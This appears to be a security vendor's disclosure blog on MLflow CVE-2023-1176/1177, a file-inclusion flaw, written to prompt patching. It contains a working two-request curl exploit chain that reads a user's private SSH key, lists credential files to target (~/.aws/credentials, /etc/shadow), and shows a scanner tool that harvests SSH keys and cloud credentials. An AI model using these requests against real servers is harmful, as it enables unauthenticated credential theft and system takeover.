One of the most popular tools in an ML system is MLflow (with over 13 million monthly downloads and climbing), which is used for managing the end-to-end machine learning lifecycle.
Protect AI tested the security of MLflow and found a combined Local File Inclusion/Remote File Inclusion vulnerability which can lead to a complete system or cloud provider takeover. Organizations running an MLflow server are urged to update to the latest release, or at least version 2.2.2, immediately. Version 2.2.1 fixes CVE-2023-1177 and version 2.2.2 fixes CVE-2023-1176.

In this blog, we explore the impact of this vulnerability, how to detect it, and our process for discovering these critical impacts. If you are running MLflow, please use our free tool provided in this blog and begin patching your systems immediately. Patching may be a challenge with your traditional tools, since many automated patch management systems do not enumerate or identify MLflow, and those that do may not perform version checks.
It's critical that you upgrade to the latest version of MLflow immediately, even if your instances are not in production and are used only in development environments.
The exploitation of this vulnerability allows a remote unauthenticated attacker to read any file on the server that the user who started the MLflow server can access.
Remote code execution can be achieved by grabbing private SSH keys or cloud service provider credentials from the MLflow server. This allows an attacker to remotely log in to the server or cloud resources and perform arbitrary code execution under the permissions of the credentials found.
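As a simple illustration of the first case, a stolen key can be used directly with ssh (the key path, username, and host below are hypothetical placeholders, not values from our testing):
# Hypothetical example: log in to the MLflow host with a stolen private key
ssh -i stolen_id_rsa ubuntu@mlflow-host.example.com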
The MLflow maintainers responded extremely quickly to the responsible disclosure of this vulnerability, delivering fixes in mere weeks. MLflow versions 2.2.2 and later are no longer vulnerable to either issue.
To check if your MLflow server is vulnerable, use our free CVE-2023-1177-scanner tool.
We started by installing MLflow, firing up the intercepting proxy BurpSuite to intercept all MLflow API calls, running an experiment to populate MLflow with data, and then starting the UI server for exploration.
# Download MLflow source to get access to their example runs
git clone https://github.com/mlflow/mlflow
# Create and enter new directory outside the mlflow/ directory
mkdir mlflowui
cd mlflowui
# Copy the example code from the MLflow source into this new directory
cp -r ../mlflow/examples/sklearn_elasticnet_wine .
# Setup a virtual environment for installing requirements
python3 -m venv venv
source venv/bin/activate
# Install mlflow in this virtual environment
pip install mlflow pandas
# Run the example experiment
mlflow run --env-manager=local sklearn_elasticnet_wine -P alpha=0.5
# Run the UI to see the experiment details
mlflow ui --host 127.0.0.1 --port 8000
When creating an experiment, the UI gave us the option of specifying a directory in which the experiment's objects would be stored. This appeared to be a configurable file path, as seen via the example experiment we ran:
This immediately caught our attention, as it would require perfectly implemented filtering to prevent local file inclusion or arbitrary file overwrites. However, you cannot run an MLflow experiment remotely from the UI, and since nothing actually happens with the artifact location when you create an experiment via the UI, there are no security considerations here. We then continued the exploration by clicking into the individual experiment runs.
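For reference, this artifact location is the same field exposed by MLflow's documented experiments/create REST endpoint; a minimal sketch of such a request (the server address, experiment name, and path are placeholders):
# Sketch: creating an experiment with a custom artifact location
curl -X POST http://127.0.0.1:8000/api/2.0/mlflow/experiments/create \
  -H 'Content-Type: application/json' \
  -d '{"name": "demo-experiment", "artifact_location": "/tmp/demo-artifacts"}'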
Clicking the run name, as seen in the image above, brought us to the experiment run details, where we could see the files involved in the experiment and download them, as seen in the image below.
In this case, we saw a big “Register Model” button in our artifact files. We were curious.
It didn't seem to be anything particularly interesting; it just popped up a modal that let us select a model and then saved that model's details as “Version 1”.
But what was happening under the hood? We checked BurpSuite.
We found another protocol and file path input that wasn't shown to us in the UI. This seemed suspicious. We manually changed it to the user's private SSH key: file:///Users/danmcinerney/.ssh/id_rsa. Access to this file would allow you to remotely log in to the MLflow host machine as the user who started the MLflow server.
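The tampered request looked roughly like the sketch below; we've reconstructed it here from MLflow's model-versions/create API, and the model name and run ID are placeholders:
# Sketch: registering a model version with the source field pointed at an arbitrary file
curl -X POST http://127.0.0.1:8000/api/2.0/mlflow/model-versions/create \
  -H 'Content-Type: application/json' \
  -d '{"name": "test-model", "source": "file:///Users/danmcinerney/.ssh/id_rsa", "run_id": "<run id>"}'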
The new source was reflected in the response, which usually indicates a server-side change occurred. Curious about what this accomplished, we went back and browsed to the registered model details. Nothing in the experiment run artifacts, nothing interesting in the model details or the model version details either. It seemed like another dead end, similar to how we found you could point the experiment artifact path to an arbitrary location only for the UI to give you nothing to do with it. Upon reviewing the BurpSuite request and response log, however, something interesting showed up.
A 500 Internal Server Error in the get-artifact API call felt suspicious to us. The get-artifact API call was of interest early in the security testing because it's the call that returns file data from the artifact repository. It's how you download the model from an experiment run, and we found it was protected with a function that prevented Local File Inclusion vulnerabilities, as seen below.
We had spent some time trying to bypass this without success. The difference in this particular get-artifact call is that it's not trying to get a file from a subfolder; rather, it's directly accessing the filename. Additionally, it's not actually the same API call. Here's the documented get-artifact REST API call:
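(The request below is a reconstruction for illustration; the run ID and artifact path are placeholders.)
# Documented call: fetches an artifact by a path relative to the run's artifact root
GET /get-artifact?path=model/model.pkl&run_uuid=<run id>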
And here’s the comparable model-version/get-artifact call:
The differences include the URL path, parameters, and values. It is clearly not the same API call.
We noted that this API call isn't in the documentation. The key difference is that it looks directly for a filename via the path URL parameter, rather than a relative file path as in the legitimate get-artifact API call.
This means the LFI protection is absent because there’s no requirement to do a directory traversal. One needs only to control the source folder location. A few steps above, we tried to modify an API request’s source path location to file:///Users/danmcinerney/.ssh/id_rsa when we created a new model version:
What we should have done was change the source location to a folder, not a file. We corrected that.
We then resent the undocumented REST API call we had found and pointed it at id_rsa, a file within the new model version's source location containing the private SSH key that unlocks the ability to remotely log in to the server.
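Put together, the whole chain is only two requests. A minimal sketch, reusing the placeholder model name and paths from above:
# 1. Register a model version whose source points at the target folder (not a file)
curl -X POST http://127.0.0.1:8000/api/2.0/mlflow/model-versions/create \
  -H 'Content-Type: application/json' \
  -d '{"name": "test-model", "source": "file:///Users/danmcinerney/.ssh/", "run_id": "<run id>"}'
# 2. Read any file inside that folder via the undocumented call
#    (use the version number returned by step 1)
curl 'http://127.0.0.1:8000/model-versions/get-artifact?path=id_rsa&name=test-model&version=<version>'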
Using this retrieved SSH key, we can gain terminal access to the host running the MLflow server. MLflow is most often configured to use an S3 bucket as an artifact store. If that is the case, then another very high-value target on the machine would be the ~/.aws/credentials file which, as one can imagine, stores AWS credentials.
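That credentials file follows a simple INI format, and a stolen copy works directly with the AWS CLI (all values below are placeholders):
# Typical layout of ~/.aws/credentials (placeholder values)
[default]
aws_access_key_id = AKIAXXXXXXXXXXXXXXXX
aws_secret_access_key = XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# An attacker can then confirm what the keys are allowed to do, for example:
aws sts get-caller-identity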
Other high-value targets could include files such as web server SQL configs, which contain plaintext passwords, or /etc/shadow, which contains all user password hashes that can be cracked with a tool such as hashcat.
To help protect your systems, we have created a simple tool to surface your potential vulnerability, named MLFIflow.py (M + LFI + flow).
Installation
git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/MLFIflow
python3 -m venv mlfiflow
source mlfiflow/bin/activate
pip install -r requirements.txt
Usage
By default, MLFIflow will attempt to read /etc/passwd from the MLflow server and use the usernames found to search for SSH keys and cloud credential files:
python MLFIflow.py -s http://1.2.3.4:5000
To specify a custom wordlist of files to download, use the -f flag:
python MLFIflow.py -s http://1.2.3.4:5000 -f /path/to/wordlist.txt
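The wordlist is simply a newline-separated list of absolute paths to request; for example (the paths below are illustrative):
/etc/passwd
/etc/shadow
/root/.ssh/id_rsa
/home/ubuntu/.aws/credentials
/var/www/html/wp-config.php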
We're always eager to hear from and collaborate with other security researchers interested in keeping the AI field secure. If you'd like to work together on compensated AI security research, drop me an email at dan@protectai.com.